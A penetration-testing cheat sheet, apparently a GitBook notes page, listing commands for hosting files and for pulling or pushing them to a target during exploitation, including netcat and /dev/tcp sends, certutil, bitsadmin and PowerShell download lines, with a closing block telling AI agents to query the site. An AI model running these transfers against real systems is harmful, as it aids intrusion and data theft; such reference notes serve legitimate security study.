# File Transfer ### Alojando archivo | Comando | Descripción | | --------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------- | |

python -m SimpleHTTPServer \[PORT]
python3 -m http.server \[PORT]

| Python HTTP Server modules | | service apache2 start; systemctl start apache2; | Apache web server, requires to place files in the /var/www/html/ directory | | service nginx start; systemctl start nginx | Nginx web server, requires to place files in or /usr/share/nginx/html or /var/www/html | | php -S 0.0.0.0:PORT | PHP builtin web server bundle | | nc -q 0 -lvp 443 < file | Netcat listener to transfer files | | cat < archivo > /dev/tcp/\/\ | Send this file to the target, with our \ and \, the listener must waiting with this: nc -lvnp \ > archivo | | nc -nv IP\_ADDR 443 < file | Netcat command to send files | | smbserver.py SHARE share\_dir | Impacket’s smbserver.py script simulates a SMB server | | service smbd start; systemctl start smbd | Linux Samba, a share has to be added to /etc/samba/smb.conf | | service pure-ftpd start; systemctl start pure-ftpd; service proftpd start; systemctl start proftpd | Services such as pure-ftpd and proftpd can be used to setup FTP servers | | atftpd –daemon –port 69 ftp\_dir | The atftpd utility allows to easily setup a TFTP server | | ruby -rwebrick -e’WEBrick::HTTPServer.new(:Port => PORT, :DocumentRoot => Dir.pwd).start’ | Ruby web server using the Web brick library | | ruby -run -e httpd . -p \[PORT] | Ruby simple http server | |

cpan HTTP::Server::Brick;
perl -MHTTP::Server::Brick -e ‘$s=HTTP::Server::Brick->new(port=>PORT); $s->mount(“/”=>{path=>”.”}); $s->start’

| Perl Brick HTTP Server | | “C:\Program Files (x86)\IIS Express\iisexpress.exe” /path:C: /port:PORT | Microsoftg IIS Express | | base64 file; | Encoding the the file using base 64 and decoding it in the target machine | *** ### Descargar el archivo | Comando | Descripción | | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------- | | wget [http://ip-addr:port/file](https://j4ckie0x17.gitbook.io/notes-pentesting/explotacion/http:/ip-addr:port/file) \[-o output\_file] | Wget comes preinstalled with most Linux systems | | curl [http://ip-addr:port/file](https://j4ckie0x17.gitbook.io/notes-pentesting/explotacion/http:/ip-addr:port/file) -o output\_file | Curl comes preinstalled with most Linux and some Windows systems | | certutil -f-urlcache -split [http://ip-addr:port/file](https://j4ckie0x17.gitbook.io/notes-pentesting/explotacion/http:/ip-addr:port/file) output\_file | Certutil is a Windows builtin command line tool | |

powershell -c Invoke-WebRequest -Uri [http://ip-addr:port/file](https://j4ckie0x17.gitbook.io/notes-pentesting/explotacion/http:/ip-addr:port/file) -OutFile output\_file;
powershell -c (New-Object Net.WebClient).DownloadFile(‘[http://ip-addr:port/file’](https://j4ckie0x17.gitbook.io/notes-pentesting/explotacion/http:/ip-addr:port/file’), ‘output\_file’)

| Powershell Invoke-WebRequest cmdlet or the System.Net.WebClient class | | | | | bitsadmin /transfer job /download /priority high output\_file | Bitsadmin Windows command-line tool | | nc -nv IP\_ADDR 443 > file | Netcat command to download files from a Netcat listener | | nc -q 0-lvp 443 > file | Netcat listener to receive files | | copy \IP\_ADDR\SHARE\output\_file | Copy command to download files from an SMB share | | smbget smb://domain;user\[:password@]server/share/path/file | smbget utility to download files from a Samba share | |

Wget
wget ftp\://user:password\@IP\_ADDR/path/file -o output\_file
FTP
echo open 192.168.1.64 21> ftp.txt
echo anonymous>> ftp.txt
echo >> ftp.txt
echo bin >> ftp.txt
echo get test.txt >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt

| Wget and FTP to download files from an FTP server | | tftp | tftp -i IP\_ADDR {GET \| PUT} file | | scp /path/file username\@IP\_ADDR:/path/file | Secure File Copy SSH tool | | | Windows Virtual Basic scripts | | php -r “file\_put\_contents(‘output\_file’, fopen(‘[http://ip-addr:port/file’](https://j4ckie0x17.gitbook.io/notes-pentesting/explotacion/http:/ip-addr:port/file’), ‘r’));” | PHP file\_put\_contents function | |

python -c ‘from urllib import urlretrieve; urlretrieve(“[http://ip-addr:port/file”](https://j4ckie0x17.gitbook.io/notes-pentesting/explotacion/http:/ip-addr:port/file”), “output\_file”)’;
python3 -c ‘from urllib.request import urlretrieve; urlretrieve(“[http://ip-addr:port/file”](https://j4ckie0x17.gitbook.io/notes-pentesting/explotacion/http:/ip-addr:port/file”), “output\_file”)’

| The Python urlretrieve function which is part of the urllib library can be used to download files | |

perl -MLWP::Simple -e ‘getstore(“http\://IP\_ADDR/file”, “out\_file”)’;
perl -e ‘use LWP::Simple; getstore(“http\://IP\_ADDR/file”, “out\_file”)’

| Library for WWW in Perl | | ruby -e ‘require “open-uri”;File.open(“output\_file”, “wb”) do \|file\|;URI.open(“[http://ip-addr:port/file”).read;end’](https://j4ckie0x17.gitbook.io/notes-pentesting/explotacion/http:/ip-addr:port/file”\).read;end’) | Ruby Open-URI library | | echo -n “base64-output” > file | Decoding the base64 output of the file | --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://j4ckie0x17.gitbook.io/notes-pentesting/explotacion/file-transfer.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.